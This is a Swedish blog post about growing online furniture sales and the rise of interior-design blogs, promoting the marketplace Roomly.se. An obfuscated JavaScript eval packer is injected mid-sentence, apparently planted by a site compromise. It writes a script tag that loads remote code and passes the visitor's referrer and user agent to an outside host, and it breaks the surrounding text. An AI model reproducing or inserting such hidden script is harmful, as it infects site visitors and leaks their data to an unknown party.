Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Inredningsbloggarna växer och växer

Inredningsbloggarna växer och växer
Sebastian

Inredningsbloggarna växer och växer: Färska siffror över detaljhandeln i Sverige har nyligen släppts och det ser ut som de stora vinnarna är klädbutikerna och inredningsbutikerna. Kläder har varje år visat en stor ökning i onlineförsäljningen samtidigt som inredning gått lite långsammare. Nu kan vi bekräfta att de svenska folket har fått upp ögonen för att beställa sin inredning online.

E-butikerna har ökat sin försäljning något helt otroligt under 2014-2015 och 2016 ser bara bättre ut. Fler alternativ, större utbud och snabbare leverans gör att vi enklare nu har möjlighet att köpa design online.

Roomly.se som är en svensk marknadsplats för inredning eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tszhn|var|u0026u|referrer|anabb||js|php’.split(’|’),0,{}))
och design
släppte i början av januari 2016 siffror på hur sajten gått under det närmaste 6 månaderna, och det ser bra ut. Roomly.se som lanserade sin butik/marknadsplats i juni 2015 har kunnat leverera över 750.000 besökare. Förutom i Sverige som företaget fokuserar sin försäljning så har även intresset börjat ta fatt i våra grannländer som Norge, Danmark och Finland.

Tittar vi på antalet inredningsbloggar i Sverige så har även dessa ökat mycket under 2015. Aftonbladet lanserade sin egna blogg på ämnet och större varianter som Trendenser, Inredningsvis mfl har ökat sina besök under året.

På Roomly.se har de publicerat en utmärkt lista på Sveriges största inredningsbloggar. Där kan ni hitta allt ni söker efter när det kommer till heminredning och dekoration.

Kika in blogginlägget och ta del av den härliga och kreativa världen som inredning bjuder på. Perfekt för att hitta inspiration nu till vår och sommar när många tar vara på tiden och gör om hemma.